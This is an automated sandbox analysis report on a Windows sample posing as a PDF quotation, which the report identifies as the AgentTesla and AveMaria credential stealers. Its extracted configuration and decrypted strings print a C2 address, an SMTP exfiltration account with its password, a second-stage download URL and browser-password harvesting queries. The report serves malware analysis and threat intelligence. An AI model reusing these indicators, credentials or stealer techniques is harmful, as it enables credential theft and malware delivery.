Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe

Overview

General Information

Sample Name:QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe
Original Sample Name:QUOTATION_SEPT9FIBA00541PDF.scr.exe
Analysis ID:1310586
MD5:404e68a96892ecfcb88a114e31abb55c
SHA1:01db0f21268b21aeeced4445220c1ab38aa74913
SHA256:4a564bf525a47e450c43e6dfa9bc9de4395e6dfb9707d1682f88dc86046e69a0
Tags:exe
Infos:

Detection

AgentTesla, AveMaria
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected AgentTesla
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Yara detected AveMaria stealer
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Tries to steal Mail credentials (via file / registry access)
Initial sample is a PE file and has a suspicious name
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Costura Assembly Loader
Machine Learning detection for sample
.NET source code contains potential unpacker
Uses ipconfig to lookup or modify the Windows network settings
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Installs a global keyboard hook
Increases the number of concurrent connection per server for Internet Explorer
Contains functionality to hide user accounts
Contains functionality to log keystrokes (.Net Source)
Contains functionality to steal e-mail passwords
Contains functionality to steal Chrome passwords or cookies
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Contains functionality to inject threads in other processes
Contains functionality to create new users
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to enumerate running services
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Contains functionality to download and execute PE files
Contains functionality to retrieve information about pressed keystrokes
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to call native functions
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Detected TCP or UDP traffic on non-standard ports
Contains functionality to download and launch executables
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Classification

Process Tree

  • System is w10x64
  • QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe (PID: 6840 cmdline: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe MD5: 404E68A96892ECFCB88A114E31ABB55C)
    • cmd.exe (PID: 6896 cmdline: "C:\Windows\System32\cmd.exe" /c ipconfig /release MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • ipconfig.exe (PID: 6936 cmdline: ipconfig /release MD5: B0C7423D02A007461C850CD0DFE09318)
    • dllhost.exe (PID: 4788 cmdline: C:\Windows\system32\DllHost.exe /Processid:{AA65DD7C-83AC-48C0-A6FD-9B61FEBF8800} MD5: 2528137C6745C4EADD87817A1909677E)
    • cmd.exe (PID: 492 cmdline: "C:\Windows\System32\cmd.exe" /c ipconfig /renew MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • ipconfig.exe (PID: 2364 cmdline: ipconfig /renew MD5: B0C7423D02A007461C850CD0DFE09318)
    • AppLaunch.exe (PID: 4788 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe MD5: 4DF5F963C7E18F062E49870D0AFF8F6F)
      • donexx.exe (PID: 6436 cmdline: "C:\Users\user\AppData\Local\Temp\donexx.exe" MD5: 5CA8DE5B7C87D36341F0578A03615AEE)
        • aspnet_compiler.exe (PID: 2472 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: A1CC6D0A95AA5C113FA52BEA08847010)
  • Fhzejfh.exe (PID: 5712 cmdline: "C:\Users\user\AppData\Roaming\Fhzejfh.exe" MD5: 5CA8DE5B7C87D36341F0578A03615AEE)
  • Fhzejfh.exe (PID: 5620 cmdline: "C:\Users\user\AppData\Roaming\Fhzejfh.exe" MD5: 5CA8DE5B7C87D36341F0578A03615AEE)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
NameDescriptionAttributionBlogpost URLsLink
Ave Maria, AveMariaRAT, avemariaInformation stealer which uses AutoIT for wrapping.
  • Anunak
https://malpedia.caad.fkie.fraunhofer.de/details/win.ave_maria

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Host": "smtp.yandex.com", "Username": "frankneymars42@yandex.com", "Password": "uikstcmljdzhturh"}

Threatname: AveMaria

{"C2 url": "91.207.102.163", "port": 26167}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000024.00000002.472719163.00000000029EC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    00000026.00000002.472797955.000000000287C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
      00000026.00000002.473331957.00000000038D2000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        00000019.00000002.408610902.0000000002C4A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          00000026.00000002.472797955.0000000002884000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            Click to see the 48 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.5410000.17.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              33.2.aspnet_compiler.exe.400000.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                33.2.aspnet_compiler.exe.400000.1.unpackJoeSecurity_AveMariaYara detected AveMaria stealerJoe Security
                  33.2.aspnet_compiler.exe.400000.1.unpackWindows_Trojan_AveMaria_31d2bce9unknownunknown
                  • 0x18720:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q
                  • 0x17008:$a2: SMTP Password
                  • 0x16248:$a3: select signon_realm, origin_url, username_value, password_value from logins
                  • 0x185a8:$a5: for /F "usebackq tokens=*" %%A in ("
                  • 0x16a38:$a6: \Torch\User Data\Default\Login Data
                  • 0x175a4:$a8: "os_crypt":{"encrypted_key":"
                  • 0x16ed0:$a10: \logins.json
                  • 0x1751c:$a11: Accounts\Account.rec0
                  • 0x18348:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
                  33.2.aspnet_compiler.exe.400000.1.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                  • 0x16678:$a1: \Opera Software\Opera Stable\Login Data
                  • 0x169a0:$a2: \Comodo\Dragon\User Data\Default\Login Data
                  • 0x162e8:$a3: \Google\Chrome\User Data\Default\Login Data
                  Click to see the 53 entries

                  Sigma Signatures

                  No Sigma rule has matched

                  Snort Signatures

                  No Snort rule has matched

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus detection for URL or domain
                  Source: 91.207.102.163Avira URL Cloud: Label: malware
                  Antivirus detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeAvira: detection malicious, Label: TR/AD.MortyStealer.wzwcq
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exeAvira: detection malicious, Label: TR/AD.MortyStealer.wzwcq
                  Found malware configuration
                  Source: 25.2.donexx.exe.2b95e08.9.raw.unpackMalware Configuration Extractor: AveMaria {"C2 url": "91.207.102.163", "port": 26167}
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "smtp.yandex.com", "Username": "frankneymars42@yandex.com", "Password": "uikstcmljdzhturh"}
                  Multi AV Scanner detection for submitted file
                  Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeReversingLabs: Detection: 44%
                  Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeVirustotal: Detection: 46%Perma Link
                  Antivirus / Scanner detection for submitted sample
                  Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeAvira: detected
                  Yara detected AveMaria stealer
                  Source: Yara matchFile source: 33.2.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.2.donexx.exe.3aef7b0.17.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.2.donexx.exe.3aef7b0.17.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.2.donexx.exe.2b95e08.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.2.donexx.exe.2b90e08.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 33.2.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000019.00000002.408924727.0000000003AEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000019.00000002.408610902.0000000002B47000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Multi AV Scanner detection for domain / URL
                  Source: 91.207.102.163Virustotal: Detection: 17%Perma Link
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exeReversingLabs: Detection: 28%
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exeVirustotal: Detection: 47%Perma Link
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeReversingLabs: Detection: 28%
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeVirustotal: Detection: 47%Perma Link
                  Machine Learning detection for sample
                  Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeJoe Sandbox ML: detected
                  Sample uses string decryption to hide its real strings
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: /log.tmp
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: <br>[
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: yyyy-MM-dd HH:mm:ss
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: ]<br>
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: <br>
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Time:
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: MM/dd/yyyy HH:mm:ss
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: <br>User Name:
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: <br>Computer Name:
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: <br>OSFullName:
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: <br>CPU:
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: <br>RAM:
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: <br>
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: IP Address:
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: <br>
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: <hr>
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: New
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: MM/dd/yyyy HH:mm:ss
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: IP Address:
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: false
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: true
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: false
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: true
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: false
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: false
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: false
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: true
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: false
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: smtp.yandex.com
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: frankneymars42@yandex.com
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: uikstcmljdzhturh
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: frankneymars42@yandex.com
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: true
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: false
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: false
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: appdata
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: cGwIUTI
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: cGwIUTI.exe
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: cGwIUTI
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Type
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: http://cdn.discordapp.com/attachments/1152164172566630421/1153190859320328273/Vvdsupbjet.exe
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \donexx.exe
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \donexx.exe
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: <br>
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: <hr>
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: <br>
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: <b>[
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: ]</b> (
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: )<br>
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: {BACK}
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: {ALT+TAB}
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: {ALT+F4}
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: {TAB}
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: {ESC}
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: {Win}
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: {CAPSLOCK}
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: {KEYUP}
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: {KEYDOWN}
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: {KEYLEFT}
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: {KEYRIGHT}
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: {DEL}
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: {END}
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: {HOME}
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: {Insert}
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: {NumLock}
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: {PageDown}
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: {PageUp}
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: {ENTER}
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: {F1}
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: {F2}
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: {F3}
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: {F4}
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: {F5}
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: {F6}
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: {F7}
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: {F8}
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: {F9}
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: {F10}
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: {F11}
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: {F12}
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: control
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: {CTRL}
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: &amp;
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: &lt;
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: &gt;
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: &quot;
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: <br><hr>Copied Text: <br>
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: <hr>
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: logins
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: IE/Edge
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Windows Secure Note
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: 3CCD5499-87A8-4B10-A215-608888DD3B55
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Windows Web Password Credential
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: 154E23D0-C644-4E6F-8CE6-5069272F999F
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Windows Credential Picker Protector
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Web Credentials
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Windows Credentials
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Windows Domain Certificate Credential
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Windows Domain Password Credential
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Windows Extended Credential
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: 00000000-0000-0000-0000-000000000000
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: SchemaId
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: pResourceElement
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: pIdentityElement
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: pPackageSid
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: pAuthenticatorElement
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: IE/Edge
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: UC Browser
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: UCBrowser\
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Login Data
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: journal
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: wow_logins
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Safari for Windows
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \Common Files\Apple\Apple Application Support\plutil.exe
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \Apple Computer\Preferences\keychain.plist
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: <array>
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: <dict>
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: <string>
